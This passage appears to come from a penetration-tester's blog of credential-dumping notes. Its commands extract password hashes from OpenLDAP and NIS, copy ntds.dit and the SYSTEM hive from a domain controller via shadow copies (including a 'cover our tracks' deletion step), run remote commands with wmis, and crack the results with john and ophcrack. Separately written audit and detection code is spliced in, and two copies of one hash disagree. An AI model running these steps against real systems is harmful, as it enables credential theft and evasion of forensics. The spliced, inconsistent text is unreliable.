but.
if your passwords are crypt...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w badpassword \
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" \
-LLL -v "" uid userPassword \
| ldap2pw > ldap.pw
....
#!/usr/bin/perl -w
# ldap2pw: turn "ldapsearch -LLL" output into uid:hash lines for jtr
use strict;
use MIME::Base64;
while( <> && ! eof ) { # need eof since we will hit eof on the other <>
    chomp;
    my( $uid, $passw, $cn, $dn );
    $cn = $uid = '';
    while( <> ) { # get an object
        chomp;
        last if /^\s*$/; # objects have blank lines between them
        if( /^cn: (.+)/ ) {
            $cn = $1;
        } elsif( /^dn: (.+)/ ) {
            $dn = $1;
        } elsif( /^userP\w+:: (.+)/ ) {
            $passw = substr( decode_base64($1), 7 ); # strip the 7-char "{crypt}" prefix, assuming {crypt}
        } elsif( /^uid: (.+)/ ) {
            $uid = $1;
        }
    }
    print "${uid}:${passw}\n" if defined $passw; # only output if object has password
}
...
fun.
Monday, October 31, 2016
LDAP crypt password extraction
LDAP base64 conversion for cracking
ldif and ldap password extraction
when you extract passwords from ldap, they're salted.
you need to convert them to their hashes.
why? well. because of RFC2307
userpasswordvalue = cleartext-password / prefix b64-hashandsalt
prefix = "{" scheme "}"
scheme = %x30-39 / %x41-5A / %x61-7a / %x2D-2F / %x5F
;0-9, A-Z, a-z, "-", ".", "/", or "_"
b64-hashandsalt = <base64 of hashandsalt>
hashandsalt = password-hash salt
password-hash = <digest of cleartext-password salt>
cleartext-password = %x00-FF
salt = %x00-FF
yes. that.
in a previous post i've already mentioned how to extract uids
and passwords into a nice long list for jtr...
you'll need python and the script below which will convert the list
line by line. it'll work for base64 passwords:
MD5, SHA, SHA1, SSHA, SHA256, SSHA256, &c.
first, do some text preparation:
# cut -d ":" -f1 userpassword.out > userpassword.left
# cut -d ":" -f2 userpassword.out > userpassword.base64
..................
#!/usr/bin/env python3
# base64tohex.py - decode one base64 value per line and print it as hex
import binascii
import base64
import sys

# read in lines - and decode
with open(sys.argv[1], "r") as f:
    for x in f:
        x = x.rstrip('\n')
        try:
            print(binascii.hexlify(base64.b64decode(x)).decode())
        except (binascii.Error, ValueError):
            print("Error: " + x)
..................
# ./base64tohex.py userpassword.base64 > userpassword.right
# paste -d : userpassword.left userpassword.right > userpassword.out
and if you can't figure out what you have in terms of hashes, use hash-identifier for singletons.
use hashid for lists.
# hashid userpassword.right -o userpassword.hashid
after base64 conversion, of course.
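The RFC2307 grammar above and the base64 conversion step are easiest to see in code. The following is an added example, not from the original post: it parses a userPassword value into scheme, digest and salt (for the salted schemes the salt is whatever follows the fixed-length digest inside the base64 blob), recomputes the digest the way a directory server verifying a bind would, and audits an LDIF export for weak storage schemes, coping with entries whose attributes arrive in any order. The LDIF entries, uids and salt are constructed; the {CLEARTEXT} scheme name is OpenLDAP's, not part of RFC2307.

```python
#!/usr/bin/env python3
"""Parse RFC 2307 userPassword values and audit the storage scheme.

Added example, not from the original post. Sample LDIF entries are constructed;
the SSHA value is generated in-line so the script runs offline.
"""
import base64
import binascii
import hashlib
import re

# digest length per salted scheme; everything after the digest is the salt
DIGEST_LEN = {"SSHA": 20, "SSHA256": 32, "SSHA512": 64, "SMD5": 16}
HASH_FN = {"SSHA": hashlib.sha1, "SSHA256": hashlib.sha256, "SSHA512": hashlib.sha512,
           "SMD5": hashlib.md5, "SHA": hashlib.sha1, "MD5": hashlib.md5}
# reversible, unsalted or fast schemes an audit should flag
WEAK = {"CLEARTEXT", "MD5", "SHA", "SMD5"}
# prefix = "{" scheme "}" with scheme = 0-9 A-Z a-z - . / _
PREFIX_RE = re.compile(r"^\{([0-9A-Za-z./_-]+)\}(.*)$", re.S)

def ldif_value(line):
    """Raw bytes of an LDIF attribute line: 'attr:: b64' or 'attr: literal'."""
    _attr, _sep, rest = line.partition(":")
    if rest.startswith(":"):
        return base64.b64decode(rest[1:].strip())
    return rest.strip().encode()

def parse_userpassword(raw):
    """Return (scheme, digest, salt); scheme is None for a bare cleartext value."""
    m = PREFIX_RE.match(raw.decode("latin-1"))
    if not m:
        return None, raw, b""
    scheme, blob = m.group(1).upper(), m.group(2).encode("latin-1")
    if scheme in ("CLEARTEXT", "CRYPT"):
        return scheme, blob, b""            # crypt(3) strings carry their own salt
    hashandsalt = base64.b64decode(blob)    # b64-hashandsalt from the grammar
    n = DIGEST_LEN.get(scheme)
    if n is None:
        return scheme, hashandsalt, b""     # unsalted digest
    return scheme, hashandsalt[:n], hashandsalt[n:]

def verify(raw, candidate):
    """Recompute digest(cleartext-password salt) as the server would on bind."""
    scheme, digest, salt = parse_userpassword(raw)
    if scheme is None or scheme == "CLEARTEXT":
        return digest == candidate.encode()
    if scheme not in HASH_FN:
        raise ValueError("unsupported scheme " + scheme)
    return HASH_FN[scheme](candidate.encode() + salt).digest() == digest

def make_ssha(password, salt):
    """Build an {SSHA} value; used here only to construct the sample data."""
    digest = hashlib.sha1(password.encode() + salt).digest()
    return b"{SSHA}" + base64.b64encode(digest + salt)

def audit(ldif_text):
    """One finding per entry with a userPassword, whatever order the attributes come in."""
    findings = []
    for entry in re.split(r"\n\s*\n", ldif_text.strip()):
        uid, pw = None, None
        for line in entry.splitlines():
            if line.startswith("uid:"):
                uid = ldif_value(line).decode()
            elif line.lower().startswith("userpassword:"):
                pw = ldif_value(line)
        if pw is None:
            continue
        scheme, digest, salt = parse_userpassword(pw)
        name = scheme or "CLEARTEXT"
        findings.append({"uid": uid, "scheme": name,
                         "hash_hex": binascii.hexlify(digest).decode(),
                         "salt_hex": binascii.hexlify(salt).decode(),
                         "verdict": "weak" if name in WEAK else "ok"})
    return findings

SALT = b"\x01\x02\x03\x04"   # constructed fixed salt so the output is reproducible
SAMPLE_LDIF = "\n".join([
    "dn: uid=alice,ou=users,dc=my,dc=pants,dc=com",
    "userPassword:: " + base64.b64encode(make_ssha("correct horse", SALT)).decode(),
    "uid: alice",                           # attribute order juggled on purpose
    "",
    "dn: uid=bob,ou=users,dc=my,dc=pants,dc=com",
    "uid: bob",
    "userPassword:: " + base64.b64encode(
        b"{MD5}" + base64.b64encode(hashlib.md5(b"hunter2").digest())).decode(),
    "",
    "dn: uid=carol,ou=users,dc=my,dc=pants,dc=com",
    "uid: carol",
    "userPassword: {CLEARTEXT}letmein",
    "",
    "dn: cn=admin,dc=my,dc=pants,dc=com",   # no password attribute: skipped
    "cn: admin",
])

if __name__ == "__main__":
    for f in audit(SAMPLE_LDIF):
        print("%-6s %-9s %-4s hash=%s salt=%s" % (f["uid"], f["scheme"],
              f["verdict"], f["hash_hex"], f["salt_hex"]))
```

The hash_hex column is what base64tohex.py produces once the prefix is stripped; the salt_hex column is the part that must travel with it, which is why the salted formats in jtr take the whole base64 blob rather than a bare digest.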
Wednesday, October 26, 2016
LDAP attributes for password extraction
for ldap attribute extraction the following are key:
Filter: (objectClass=*)
Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword
i have access to an openldap server. yes!
the search DN is:
dc=my,dc=pants,dc=com
valid user accounts are kept:
ou=users,DN
retired user accounts are kept:
ou=yawn,DN
let's grab passwords...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword \
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" -LLL \
-v "(objectClass=*)" sambaLMPassword > lmpassword
i know that all valid accounts have this format:
dn: uid=username
some places have a different dn: than the valid logon id.
those can be simply the attribute uid=username
my script below is to slice and dice "dn: uid="
when doing the ldap dump, however, attributes may be juggled. more advanced
text sorting is required for proper formatting... i digress.
#!/bin/bash
dumporig=userpassword
dump=userpassword.sed
cp $dumporig $dump
sed -i '/ou=groups/d' $dump # remove groups as dumped
sed -i '/sambaDomainName/d' $dump # there are no passes for me here
sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump # admin has cn: as do others
sed -i '/^$/d' $dump # blank lines be gone
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump # stripping dn
sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump # removing dangling dn
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump # stripping dn
sed -i 's/,dc=my,dc=pants,dc=com//g' $dump # removing dangling dn
sed -i '/dc=my/d' $dump # removing dangling dn
sed -i 's/dn:\ uid=//g' $dump # we only want uid
sed -i '/dn:\ /d' $dump # for records that only have a leading dn:
sed -i ':a;N;$!ba;s/\n/blast/g' $dump # fun with line breaks
sed -i 's/userPassword::/userPassword:/g' $dump # converting attribute. some are :: others :
sed -i 's/userPassword//g' $dump # remove the attribute name altogether. one : remains
sed -i 's/blast:\ /:/g' $dump # fun
sed -i 's/blast/\n/g' $dump # convert fun to a new line
sed -i '/:/!d' $dump # no : ? go away
sed -i '/^:/d' $dump # start with : ? go away
sed -i 's/=//g' $dump # remove trailing =
sort -u $dump > $dump.out # sort the output
rm $dump # remove temp file
for LMPassword it is a little simpler.
NTPassword is the same; replace the LMPassword attribute for file
processing.
#!/bin/bash
dumporig=lmpassword
dump=lmpassword.sed
cp $dumporig $dump
sed -i '/ou=groups/d' $dump
sed -i '/sambaDomainName/d' $dump
sed -i '/dn:\ cn=/d' $dump
sed -i '/^$/d' $dump
sed -i '/^uid:\ /d' $dump # removing uid if we dumped it
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump
sed -i '/dc=my/d' $dump
sed -i 's/dn:\ uid=//g' $dump
sed -i ':a;N;$!ba;s/\n/blast/g' $dump
sed -i 's/sambaLMPassword//g' $dump
sed -i 's/blast:\ /:/g' $dump
sed -i 's/blast/\n/g' $dump
sed -i '/:/!d' $dump
sort -u $dump > $dump.out
rm $dump
but... what is the rootdn password for accessing the openldap server?
it is found here:
/etc/ldap/slapd.conf
scroll down to:
rootdn
another account worth checking is replicator, but
it may be restricted to certain hosts.
rootdn "cn=admin,dc=my,dc=pants,dc=com"
moduleload syncprov.la
overlay syncprov
syncprov-checkpoint 100 10
syncprov-sessionlog 100
rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p
crack that password by placing the following in a text file, say slap.out:
rootpw:{SSHA}VDE302qCXhD2yqF/woV4XI5hAcS1ds6p
/opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out
* note: --format=salted-sha1-opencl may barf:
Build log: ptxas error : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)
it is only one password...
however.
if you are are able to grab an ldif, things are way easier.
sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out
this has you searching for the strings "dn:" and "Password" and printing their lines out in that
order to an output file.
easy. then you parse away.
password cracking post john
post dsusers.py and john...
let's say you've cracked away and still can't crack the hash.
someone may already have done it for you.
findmyhash is an automated way to search online databases:
# findmyhash TYPE -h "hash" -g (searches the Google)
Do a batch job because you don't want to copy and paste
your life away (no Google, sorry):
# findmyhash TYPE -f FILE
...
that's useful, but doing things with a file is the way to go.
here's how to create a file with post-cracked john LANMAN
passes... the below shows what's left, does some formatting,
removes the first couple of fields, and dumps the type of password.
# john --show=LEFT --format=lm lmhash.out | grep -v "password hashes" | \
cut -d":" -f3 | sort -u > lmhash.only && sed -i 's/\$LM\$//g' lmhash.only
however, the findmyhash man pages state that for LANMAN/NT hashes
having both hashes is best. the dsusers.py ophc format does this for us...
ophcrack files are formatted thus (field numbers as cut -d":" counts them):
uid::lmhash:nthash:sid::
1=uid 2=(empty) 3=lmhash 4=nthash 5=sid 6,7=(empty)
we want columns 3 and 4.
note: not all active directory accounts have a stored LANMAN password. crud.
that's why we're using sed to remove the leading : . joy.
# cat nthash.oph | cut -d":" -f3,4 | sort -u > nthash.only && sed -i 's/^://' nthash.only
now plug it in:
# findmyhash LM -f nthash.only
yay! our passwords are all over the internets. who knew?
..
a cracking interlude...
passwords found in LDAP databases can be challenging.
TYPE can be any of: MD5, CRYPT, DES, NT, LANMAN
gross. just gross. but... if the passwords you're accessing are
from an LDAP-Samba database, get at one of those passwords and
you're golden. figuring out the hash type can be challenging.
hash-identifier may be of use.
# hash-identifier
place hash on HASH: line
and then you can use the same format as above with findmyhash.
only, specify MD5, CRYPT...
Monday, October 24, 2016
ophcrack and jtr coexisting notes
when using ophcrack and dsusers.py, do not specify --lmoutfile, as dsusers.py will
place the lm hashes and nt hashes in the same file for use by ophcrack.
python ~/ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.4 ~/temp \
--passwordhistory --passwordhashes --ntoutfile ~/domain.oph/domain-nthash.oph --pwdformat ophc --syshive ~/broadway/system
when running ophcrack via a cracking rig, here's the format:
# ophcrack -v -g -u -n 7 -l ~/oph/domain-nthash.log -o ~/oph/domain-nthash.cracked -d /usr/share/ophcrack/ \
-t vista_free:vista_proba_free:xp_free_fast:xp_german:vista_num:vista_special:xp_free_small \
-f ~/oph/domain-nthash.oph
-l log of work
-o cracked passwords. this is basically the oph file with the lanman and nt passes appended at the end.
-d location of rainbow tables
-t are the rainbow table directories
-f the oph hash file
let's say you've already run your grabbed hashes through john and want to crack the
leftovers via ophcrack.
# ./john --show=LEFT --format=nt nthash.out | grep -v "password hashes" | cut -d":" -f1,2 | \
sort -u > domain-nthash.sort && sed -i 's/:/::/g' domain-nthash.sort
# sort -u domain-nthash.oph > domain-nthash.oph-sort && mv domain-nthash.oph-sort domain-nthash.oph
# gawk -F:: '
FNR==NR {a[NR]=$1; next};
{b[$1]=$0}
END{for (i in a) if (a[i] in b) print b[a[i]]}
' domain-nthash.sort domain-nthash.oph | sort -u > domain-nthash.oph.sort-new && mv domain-nthash.oph.sort-new domain-nthash.oph
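As an added example (not the post's own script), here is the same column handling and the gawk join in Python: it parses ophcrack lines into fields, reports which accounts still carry an LM hash (a NoLMHash policy gap worth reporting on its own), builds the lmhash:nthash pairs without the stray leading colon, and keeps only the oph records for users john still lists as left. Usernames, SIDs and hex values are constructed placeholders; the LM hash of the empty string is the one real constant.

```python
#!/usr/bin/env python3
"""Parse ophcrack-format hash files and join them against john's leftovers.

Added example, not part of the original post. Sample lines are constructed;
the hex values are placeholders, not real account material.
"""

# LM hash of the empty string: some dumpers write this when no LM hash is stored
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

def parse_oph_line(line):
    """uid::lmhash:nthash:sid::  ->  dict, or None for blank/malformed lines."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 5 or not fields[0]:
        return None
    lm = fields[2].lower()
    return {"uid": fields[0], "lm": lm, "nt": fields[3].lower(), "sid": fields[4],
            "has_lm": lm not in ("", EMPTY_LM), "raw": line.rstrip("\n")}

def parse_oph(lines):
    recs = [parse_oph_line(l) for l in lines]
    return [r for r in recs if r]

def lm_exposure(records):
    """Audit metric: accounts whose LM hash is still stored (NoLMHash not enforced)."""
    return sorted(r["uid"] for r in records if r["has_lm"])

def hash_pairs(records):
    """The 'lmhash:nthash' column pair the post feeds to findmyhash, minus the
    leading ':' that an empty LM field would otherwise leave behind."""
    out = set()
    for r in records:
        out.add(("%s:%s" % (r["lm"], r["nt"])).lstrip(":"))
    return sorted(out)

def uncracked_users(john_left_lines):
    """Usernames from `john --show=LEFT` output; the summary line is skipped."""
    users = set()
    for line in john_left_lines:
        if "password hashes" in line or not line.strip():
            continue
        users.add(line.split(":", 1)[0])
    return users

def leftovers_for_ophcrack(john_left_lines, oph_lines):
    """Equivalent of the gawk join: keep oph records whose user john still has left."""
    left = uncracked_users(john_left_lines)
    return sorted(r["raw"] for r in parse_oph(oph_lines) if r["uid"] in left)

# constructed sample data (placeholder hex, not real hashes)
OPH_SAMPLE = [
    "alice::0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:S-1-5-21-1-2-3-1001::",
    "bob:::" + "1" * 32 + ":S-1-5-21-1-2-3-1002::",          # empty LM field
    "carol::" + EMPTY_LM + ":" + "2" * 32 + ":S-1-5-21-1-2-3-1003::",
    "",
]
JOHN_LEFT_SAMPLE = [
    "bob:$NT$" + "1" * 32,
    "carol:$NT$" + "2" * 32,
    "2 password hashes cracked, 2 left",
]

if __name__ == "__main__":
    recs = parse_oph(OPH_SAMPLE)
    print("accounts still storing an LM hash:", lm_exposure(recs))
    print("pairs for findmyhash:", hash_pairs(recs))
    print("oph lines to hand to ophcrack:", leftovers_for_ophcrack(JOHN_LEFT_SAMPLE, OPH_SAMPLE))
```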
Friday, October 21, 2016
jtr and wordlists notes
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >> dictionaries/local-upper.lst
# cat local-upper.lst >> local.lst
if you're cracking des or nt or pretty much anything that is not solely uppercase
and want to eventually feed it into lm brute forcing:
# dd if=dictionaries/local.lst of=dictionaries/local-upper.lst conv=ucase
Thursday, October 20, 2016
dumping ad passwords and cracking with jtr
yes, some people use the euphemism "windows domain controller password audit." but, let's
call it what it is: dumping ad and getting password hashes. i'm using jtr.
........................................
on a domain Controller using a privileged account:
C:\ vssadmin list shadows
none. okay.
* where's ntds.dit ? take note.
C:\Windows\NTDS\ntds.dit
* make a system dir
C:\ mkdir C:\Windows\system
* make a shadow copy of C:\
* C:\ vssadmin create shadow /for=C:
you should see:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
* C:\Users\administrator>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}
Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: domain-dc1.domain
Service Machine: domain-dc1.domain
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers,
Differential
* next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.
that would be from the shadow volume NTDS location to, say, C:\
C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\
1 file(s) copied.
* copy SYSTEM hive
C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\
1 file(s) copied.
* let's cover our tracks and prevent others from grabbing dit and SYSTEM
C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250
........................................
a linux interlude... if you have admin creds
and do not have access to a console and do
not want to have access to a console
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# apt-get install wmis
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c vssadmin list shadows > c:\output.txt"
# cat /root/mnt/output.txt
look for the Shadow Copy Volume name; that is where you'll find ntds.dit and SYSTEM
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"
# ls /root/mnt
ntds.dit SYSTEM
........................................
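From the detection side, the sequence above (create a shadow copy, copy ntds.dit and SYSTEM out of it, delete the shadow) is visible in process-creation logging. The following is an added example, not from the original post: a small rule set over constructed Sysmon-style process events (the Computer, Image, ParentImage and CommandLine field names are an assumption about the log source) plus an order-sensitive correlation that fires only when all three steps occur on one host. The remote wmis variant shows up as cmd.exe spawned by WmiPrvSE.exe, which is why the parent image is checked.

```python
#!/usr/bin/env python3
"""Detect the shadow-copy NTDS.dit collection sequence in process-creation logs.

Added example, not part of the original post. The events below are constructed
in the shape of Sysmon event 1 / 4688 fields (Computer, Image, ParentImage,
CommandLine); the field names are an assumption about the log source.
"""
import re

# a source path inside a VSS snapshot ...
SHADOW_RE = re.compile(r"HarddiskVolumeShadowCopy\d+", re.I)
# ... combined with the files the post copies out of it
SENSITIVE_RE = re.compile(r"\\ntds\.dit|\\config\\(system|sam|security)(\W|$)", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return [(rule_name, severity), ...] for one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "vssadmin.exe":
        if re.search(r"\bcreate\s+shadow\b", cmd, re.I):
            hits.append(("vssadmin_create_shadow", "medium"))
        if re.search(r"\bdelete\s+shadows\b", cmd, re.I):
            # the post's "cover our tracks" step: treat as anti-forensics
            hits.append(("vssadmin_delete_shadows", "high"))
    # `copy` is a cmd.exe builtin, so there is no separate process for it;
    # the command line of cmd.exe itself is where the snapshot path shows up
    if SHADOW_RE.search(cmd) and SENSITIVE_RE.search(cmd):
        hits.append(("credential_file_read_from_shadow_copy", "critical"))
    if image == "cmd.exe" and parent == "wmiprvse.exe":
        # remote execution through WMI (wmis / wmiexec style) lands here
        hits.append(("remote_wmi_command_shell", "medium"))
    return hits

def theft_chain(events):
    """Hosts where create-shadow, credential-file copy and delete-shadows
    occurred in that order (events must be supplied in time order)."""
    stage, hosts = {}, []
    for ev in events:
        host = ev.get("Computer", "?")
        names = {name for name, _ in evaluate(ev)}
        s = stage.get(host, 0)
        if s == 0 and "vssadmin_create_shadow" in names:
            s = 1
        elif s == 1 and "credential_file_read_from_shadow_copy" in names:
            s = 2
        elif s == 2 and "vssadmin_delete_shadows" in names:
            s = 3
            hosts.append(host)
        stage[host] = s
    return hosts

# constructed sample, in time order, mirroring the steps in the post
SAMPLE_EVENTS = [
    {"Computer": "domain-dc1", "Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin create shadow /for=C:"},
    {"Computer": "domain-dc1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp"},
    {"Computer": "domain-dc1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp"},
    {"Computer": "domain-dc1", "Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250"},
    {"Computer": "fileserver01", "Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},   # benign: listing alone is not flagged
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Computer"], evaluate(ev))
    print("full collection chain seen on:", theft_chain(SAMPLE_EVENTS))
```

Legitimate backup software also creates and deletes shadows, so the single-event rules are medium severity; the chain, or the copy of ntds.dit out of the snapshot, is what warrants paging someone.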
linux ubuntu/debian rig
install base packages:
# apt-get install cifs-utils autoconf automake autopoint libtool pkg-config
offline processing tools:
libesedb
# git clone https://github.com/libyal/libesedb.git
# cd libesedb/
# ./synclibs.sh
# ./autogen.sh
# ./configure
# make && make install
# ldconfig <- load library
creddump
# git clone https://github.com/moyix/creddump.git
ntdsxtract
# git clone https://github.com/csababarta/ntdsxtract.git
get cracking!
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# mkdir domain
# cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/
# cd ~/libesedb/esedbtools
# ./esedbexport -t ~/domain ~/domain/ntds.dit
esedbexport 20160924
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
# ls ~/domain.export
datatable.3 <- accounts
hiddentable.4
link_table.5 <- db links
MSysDefrag2.9
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer2.2
quota_rebuild_progress_table.11
quota_table.10
sdpropcounttable.6
sdproptable.7
sd_table.8
# python ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM
what does that mean?
dsusers.py <account table> <links table> <where work is done> --passwordhistory (we want them all) --passwordhashes (we want hashes) --lmoutfile <where to send lm hashes> --ntoutfile <where to send nt hashes> --pwdformat <hash format> --syshive <system hive>
[+] Started at: Thu, 20 Oct 2016 17:47:21 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: /root/domain/lmhash.out
[-] NT hash output filename: /root/domain/nthash.out
[-] Hash output format: john
The directory (/root/temp) specified does not exists!
Would you like to create it? [Y/N]
# ls ~/domain/
lmhash.out
nthash.out
* feed into jtr and use cracked passes to compose a wordlist suitable for nt format
# ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out
note: lm is not compatible with gpu cracking
# ./john --show lmhash.out
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt
# ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out
solaris 11 default passwords
from oracle support:
On Solaris 11 the default account for the system is (login/password): jack/jack and for the system account root/solaris ; please keep in mind that on Solaris 11 you can't longer login directly with the root account.
well. that's nice. that means jack, right?
Friday, October 14, 2016
dump and crack nis/nis+ password database
yeah well. that was easy.
# ypcat passwd > <file>
# john <file>
# john --show <file>
really.
Thursday, October 13, 2016
afterthefact postgre metasploit user password set
let's just say you set up metasploit with the msf user and forgot to set the password.
you go to msfconsole and see:
Failed to connect to the database: fe_sendauth: no password supplied [-] Unknown command: Failed. metasploit
crap.
$ sudo -u postgres psql
\password msf
set the password and quit
\q
edit:
$ sudo nano -w /opt/metasploit-framework/config/database.yml
On the line password: supply it.
$ echo sigh.
let's crack default factory-shipped hp ilo passwords with john
let's crack default ipmi passwords from hp ilo.
yes let's, shall we?
# mkdir -p /opt/john/dictionaries
# cd /opt/john/dictionaries
# crunch 8 8 0123456789 > eightnum.lst <- 890M
# crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ > eightalpha.lst <- 1T
# ./john --session=ipmi32 --fork=8 --format=rakp \
--wordlist=/opt/john/dictionaries/eightnum.lst out.john
gross
let's do it with both wordlists.
# ls /opt/john/dictionaries/ | xargs -t -I files \
./john --session=ipmi32 --wordlist=/opt/john/dictionaries/files --rules \
--fork=8 --format=rakp out.john
now you can let it run against all the numbers and all the alpha.
--rules will do crazy upper and lower case (just in case).
although. you may forego using wordlists altogether if you're doing simple alpha or num cracks.
go to /opt/john/john.conf and add the following stanza:
[Incremental:UpperEight]
File = $JOHN/upper.chr
MinLen = 8
MaxLen = 8
CharCount = 26
that uses john's uppercase alphabet chr file and walks through all 8-character combinations of the 26 letters.
it may take forever, but, yay.
# ./john --fork=8 --incremental:UpperEight --format=rakp ./out.john
here's something for hp's default random 8-character string drawn from the 10 digits:
[Incremental:DigitsEight]
File = $JOHN/digits.chr <- the digit charset, not upper.chr
MinLen = 8
MaxLen = 8
CharCount = 10
# ./john --fork=8 --incremental:DigitsEight --format=rakp ./out.john
for gpu cracking
first, always check how many gpus you have available:
# nvidia-smi
0, 1 under the GPU heading means you have two.
pass those device numbers to john and get cracking:
# ./john --session=ipmiopencl --format=rakp-opencl --dev=0,1 --fork=2 ./out.john
* this means you're calling on devices 0 & 1 (as noted in nvidia-smi) and you are
forking the cracking job between the two of them.
Using default input encoding: UTF-8
Loaded 245 password hashes with 245 different salts (RAKP-opencl, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 OpenCL])
Remaining 116 password hashes with 116 different salts
Node numbers 1-2 of 2 (fork)
Device 1@crackingrig: Quadro NVS 295
Device 0@crackingrig: Quadro NVS 295
Press 'q' or Ctrl-C to abort, almost any other key for status
* if you press <enter> <enter>
2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor
1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie
you'll see something similar to the above. notice that the GPU is not frying.
* nb the idea of cores does not apply to gpus, so stick to fork=2 or you might
have a really bad day. really. pay no attention to --list=cuda-devices and seeing:
Number of stream processors: 8 (1 x 8)
and the thought that it means --fork=8 per processor.
here are some numbers, from brute-force runs, to dissuade you:
